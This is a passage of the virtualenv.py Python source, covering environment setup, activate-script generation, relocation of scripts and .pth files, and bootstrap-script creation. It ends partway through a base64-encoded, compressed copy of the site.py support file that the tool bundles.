'ERROR: The executable %s is not functioning' % py_executable)
logger.fatal(
'ERROR: It thinks sys.prefix is %r (should be %r)'
% (proc_stdout, norm_home_dir))
logger.fatal(
'ERROR: virtualenv is not compatible with this system or executable')
if is_win:
logger.fatal(
'Note: some Windows users have reported this error when they '
'installed Python for "Only this user" or have multiple '
'versions of Python installed. Copying the appropriate '
'PythonXX.dll to the virtualenv Scripts/ directory may fix '
'this problem.')
sys.exit(100)
else:
logger.info('Got sys.prefix result: %r' % proc_stdout)
pydistutils = os.path.expanduser('~/.pydistutils.cfg')
if os.path.exists(pydistutils):
logger.notify('Please make sure you remove any previous custom paths from '
'your %s file.' % pydistutils)
## FIXME: really this should be calculated earlier
fix_local_scheme(home_dir, symlink)
if site_packages:
if os.path.exists(site_packages_filename):
logger.info('Deleting %s' % site_packages_filename)
os.unlink(site_packages_filename)
return py_executable
def install_activate(home_dir, bin_dir, prompt=None):
home_dir = os.path.abspath(home_dir)
if is_win or is_jython and os._name == 'nt':
files = {
'activate.bat': ACTIVATE_BAT,
'deactivate.bat': DEACTIVATE_BAT,
'activate.ps1': ACTIVATE_PS,
}
# MSYS needs paths of the form /c/path/to/file
drive, tail = os.path.splitdrive(home_dir.replace(os.sep, '/'))
home_dir_msys = (drive and "/%s%s" or "%s%s") % (drive[:1], tail)
# Run-time conditional enables (basic) Cygwin compatibility
home_dir_sh = ("""$(if [ "$OSTYPE" "==" "cygwin" ]; then cygpath -u '%s'; else echo '%s'; fi;)""" %
(home_dir, home_dir_msys))
files['activate'] = ACTIVATE_SH.replace('__VIRTUAL_ENV__', home_dir_sh)
else:
files = {'activate': ACTIVATE_SH}
# suppling activate.fish in addition to, not instead of, the
# bash script support.
files['activate.fish'] = ACTIVATE_FISH
# same for csh/tcsh support...
files['activate.csh'] = ACTIVATE_CSH
files['activate_this.py'] = ACTIVATE_THIS
if hasattr(home_dir, 'decode'):
home_dir = home_dir.decode(sys.getfilesystemencoding())
vname = os.path.basename(home_dir)
for name, content in files.items():
content = content.replace('__VIRTUAL_PROMPT__', prompt or '')
content = content.replace('__VIRTUAL_WINPROMPT__', prompt or '(%s)' % vname)
content = content.replace('__VIRTUAL_ENV__', home_dir)
content = content.replace('__VIRTUAL_NAME__', vname)
content = content.replace('__BIN_NAME__', os.path.basename(bin_dir))
writefile(os.path.join(bin_dir, name), content)
def install_distutils(home_dir):
distutils_path = change_prefix(distutils.__path__[0], home_dir)
mkdir(distutils_path)
## FIXME: maybe this prefix setting should only be put in place if
## there's a local distutils.cfg with a prefix setting?
home_dir = os.path.abspath(home_dir)
## FIXME: this is breaking things, removing for now:
#distutils_cfg = DISTUTILS_CFG + "\n[install]\nprefix=%s\n" % home_dir
writefile(os.path.join(distutils_path, '__init__.py'), DISTUTILS_INIT)
writefile(os.path.join(distutils_path, 'distutils.cfg'), DISTUTILS_CFG, overwrite=False)
def fix_local_scheme(home_dir, symlink=True):
"""
Platforms that use the "posix_local" install scheme (like Ubuntu with
Python 2.7) need to be given an additional "local" location, sigh.
"""
try:
import sysconfig
except ImportError:
pass
else:
if sysconfig._get_default_scheme() == 'posix_local':
local_path = os.path.join(home_dir, 'local')
if not os.path.exists(local_path):
os.mkdir(local_path)
for subdir_name in os.listdir(home_dir):
if subdir_name == 'local':
continue
copyfile(os.path.abspath(os.path.join(home_dir, subdir_name)), \
os.path.join(local_path, subdir_name), symlink)
def fix_lib64(lib_dir, symlink=True):
"""
Some platforms (particularly Gentoo on x64) put things in lib64/pythonX.Y
instead of lib/pythonX.Y. If this is such a platform we'll just create a
symlink so lib64 points to lib
"""
if [p for p in distutils.sysconfig.get_config_vars().values()
if isinstance(p, basestring) and 'lib64' in p]:
# PyPy's library path scheme is not affected by this.
# Return early or we will die on the following assert.
if is_pypy:
logger.debug('PyPy detected, skipping lib64 symlinking')
return
logger.debug('This system uses lib64; symlinking lib64 to lib')
assert os.path.basename(lib_dir) == 'python%s' % sys.version[:3], (
"Unexpected python lib dir: %r" % lib_dir)
lib_parent = os.path.dirname(lib_dir)
top_level = os.path.dirname(lib_parent)
lib_dir = os.path.join(top_level, 'lib')
lib64_link = os.path.join(top_level, 'lib64')
assert os.path.basename(lib_parent) == 'lib', (
"Unexpected parent dir: %r" % lib_parent)
if os.path.lexists(lib64_link):
return
if symlink:
os.symlink('lib', lib64_link)
else:
copyfile('lib', lib64_link)
def resolve_interpreter(exe):
"""
If the executable given isn't an absolute path, search $PATH for the interpreter
"""
# If the "executable" is a version number, get the installed executable for
# that version
python_versions = get_installed_pythons()
if exe in python_versions:
exe = python_versions[exe]
if os.path.abspath(exe) != exe:
paths = os.environ.get('PATH', '').split(os.pathsep)
for path in paths:
if os.path.exists(os.path.join(path, exe)):
exe = os.path.join(path, exe)
break
if not os.path.exists(exe):
logger.fatal('The executable %s (from --python=%s) does not exist' % (exe, exe))
raise SystemExit(3)
if not is_executable(exe):
logger.fatal('The executable %s (from --python=%s) is not executable' % (exe, exe))
raise SystemExit(3)
return exe
def is_executable(exe):
"""Checks a file is executable"""
return os.access(exe, os.X_OK)
############################################################
## Relocating the environment:
def make_environment_relocatable(home_dir):
"""
Makes the already-existing environment use relative paths, and takes out
the #!-based environment selection in scripts.
"""
home_dir, lib_dir, inc_dir, bin_dir = path_locations(home_dir)
activate_this = os.path.join(bin_dir, 'activate_this.py')
if not os.path.exists(activate_this):
logger.fatal(
'The environment doesn\'t have a file %s -- please re-run virtualenv '
'on this environment to update it' % activate_this)
fixup_scripts(home_dir, bin_dir)
fixup_pth_and_egg_link(home_dir)
## FIXME: need to fix up distutils.cfg
OK_ABS_SCRIPTS = ['python', 'python%s' % sys.version[:3],
'activate', 'activate.bat', 'activate_this.py',
'activate.fish', 'activate.csh']
def fixup_scripts(home_dir, bin_dir):
if is_win:
new_shebang_args = (
'%s /c' % os.path.normcase(os.environ.get('COMSPEC', 'cmd.exe')),
'', '.exe')
else:
new_shebang_args = ('/usr/bin/env', sys.version[:3], '')
# This is what we expect at the top of scripts:
shebang = '#!%s' % os.path.normcase(os.path.join(
os.path.abspath(bin_dir), 'python%s' % new_shebang_args[2]))
# This is what we'll put:
new_shebang = '#!%s python%s%s' % new_shebang_args
for filename in os.listdir(bin_dir):
filename = os.path.join(bin_dir, filename)
if not os.path.isfile(filename):
# ignore subdirs, e.g. .svn ones.
continue
f = open(filename, 'rb')
try:
try:
lines = f.read().decode('utf-8').splitlines()
except UnicodeDecodeError:
# This is probably a binary program instead
# of a script, so just ignore it.
continue
finally:
f.close()
if not lines:
logger.warn('Script %s is an empty file' % filename)
continue
old_shebang = lines[0].strip()
old_shebang = old_shebang[0:2] + os.path.normcase(old_shebang[2:])
if not old_shebang.startswith(shebang):
if os.path.basename(filename) in OK_ABS_SCRIPTS:
logger.debug('Cannot make script %s relative' % filename)
elif lines[0].strip() == new_shebang:
logger.info('Script %s has already been made relative' % filename)
else:
logger.warn('Script %s cannot be made relative (it\'s not a normal script that starts with %s)'
% (filename, shebang))
continue
logger.notify('Making script %s relative' % filename)
script = relative_script([new_shebang] + lines[1:])
f = open(filename, 'wb')
f.write('\n'.join(script).encode('utf-8'))
f.close()
def relative_script(lines):
"Return a script that'll work in a relocatable environment."
activate = "import os; activate_this=os.path.join(os.path.dirname(os.path.realpath(__file__)), 'activate_this.py'); exec(compile(open(activate_this).read(), activate_this, 'exec'), dict(__file__=activate_this)); del os, activate_this"
# Find the last future statement in the script. If we insert the activation
# line before a future statement, Python will raise a SyntaxError.
activate_at = None
for idx, line in reversed(list(enumerate(lines))):
if line.split()[:3] == ['from', '__future__', 'import']:
activate_at = idx + 1
break
if activate_at is None:
# Activate after the shebang.
activate_at = 1
return lines[:activate_at] + ['', activate, ''] + lines[activate_at:]
def fixup_pth_and_egg_link(home_dir, sys_path=None):
"""Makes .pth and .egg-link files use relative paths"""
home_dir = os.path.normcase(os.path.abspath(home_dir))
if sys_path is None:
sys_path = sys.path
for path in sys_path:
if not path:
path = '.'
if not os.path.isdir(path):
continue
path = os.path.normcase(os.path.abspath(path))
if not path.startswith(home_dir):
logger.debug('Skipping system (non-environment) directory %s' % path)
continue
for filename in os.listdir(path):
filename = os.path.join(path, filename)
if filename.endswith('.pth'):
if not os.access(filename, os.W_OK):
logger.warn('Cannot write .pth file %s, skipping' % filename)
else:
fixup_pth_file(filename)
if filename.endswith('.egg-link'):
if not os.access(filename, os.W_OK):
logger.warn('Cannot write .egg-link file %s, skipping' % filename)
else:
fixup_egg_link(filename)
def fixup_pth_file(filename):
lines = []
prev_lines = []
f = open(filename)
prev_lines = f.readlines()
f.close()
for line in prev_lines:
line = line.strip()
if (not line or line.startswith('#') or line.startswith('import ')
or os.path.abspath(line) != line):
lines.append(line)
else:
new_value = make_relative_path(filename, line)
if line != new_value:
logger.debug('Rewriting path %s as %s (in %s)' % (line, new_value, filename))
lines.append(new_value)
if lines == prev_lines:
logger.info('No changes to .pth file %s' % filename)
return
logger.notify('Making paths in .pth file %s relative' % filename)
f = open(filename, 'w')
f.write('\n'.join(lines) + '\n')
f.close()
def fixup_egg_link(filename):
f = open(filename)
link = f.readline().strip()
f.close()
if os.path.abspath(link) != link:
logger.debug('Link in %s already relative' % filename)
return
new_link = make_relative_path(filename, link)
logger.notify('Rewriting link %s in %s as %s' % (link, filename, new_link))
f = open(filename, 'w')
f.write(new_link)
f.close()
def make_relative_path(source, dest, dest_is_directory=True):
"""
Make a filename relative, where the filename is dest, and it is
being referred to from the filename source.
>>> make_relative_path('/usr/share/something/a-file.pth',
... '/usr/share/another-place/src/Directory')
'../another-place/src/Directory'
>>> make_relative_path('/usr/share/something/a-file.pth',
... '/home/user/src/Directory')
'../../../home/user/src/Directory'
>>> make_relative_path('/usr/share/a-file.pth', '/usr/share/')
'./'
"""
source = os.path.dirname(source)
if not dest_is_directory:
dest_filename = os.path.basename(dest)
dest = os.path.dirname(dest)
dest = os.path.normpath(os.path.abspath(dest))
source = os.path.normpath(os.path.abspath(source))
dest_parts = dest.strip(os.path.sep).split(os.path.sep)
source_parts = source.strip(os.path.sep).split(os.path.sep)
while dest_parts and source_parts and dest_parts[0] == source_parts[0]:
dest_parts.pop(0)
source_parts.pop(0)
full_parts = ['..']*len(source_parts) + dest_parts
if not dest_is_directory:
full_parts.append(dest_filename)
if not full_parts:
# Special case for the current directory (otherwise it'd be '')
return './'
return os.path.sep.join(full_parts)
############################################################
## Bootstrap script creation:
def create_bootstrap_script(extra_text, python_version=''):
"""
Creates a bootstrap script, which is like this script but with
extend_parser, adjust_options, and after_install hooks.
This returns a string that (written to disk of course) can be used
as a bootstrap script with your own customizations. The script
will be the standard virtualenv.py script, with your extra text
added (your extra text should be Python code).
If you include these functions, they will be called:
``extend_parser(optparse_parser)``:
You can add or remove options from the parser here.
``adjust_options(options, args)``:
You can change options here, or change the args (if you accept
different kinds of arguments, be sure you modify ``args`` so it is
only ``[DEST_DIR]``).
``after_install(options, home_dir)``:
After everything is installed, this function is called. This
is probably the function you are most likely to use. An
example would be::
def after_install(options, home_dir):
subprocess.call([join(home_dir, 'bin', 'easy_install'),
'MyPackage'])
subprocess.call([join(home_dir, 'bin', 'my-package-script'),
'setup', home_dir])
This example immediately installs a package, and runs a setup
script from that package.
If you provide something like ``python_version='2.5'`` then the
script will start with ``#!/usr/bin/env python2.5`` instead of
``#!/usr/bin/env python``. You can use this when the script must
be run with a particular Python version.
"""
filename = __file__
if filename.endswith('.pyc'):
filename = filename[:-1]
f = codecs.open(filename, 'r', encoding='utf-8')
content = f.read()
f.close()
py_exe = 'python%s' % python_version
content = (('#!/usr/bin/env %s\n' % py_exe)
+ '## WARNING: This file is generated\n'
+ content)
return content.replace('##EXT' 'END##', extra_text)
##EXTEND##
def convert(s):
b = base64.b64decode(s.encode('ascii'))
return zlib.decompress(b).decode('utf-8')
##file site.py
SITE_PY = convert("""
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
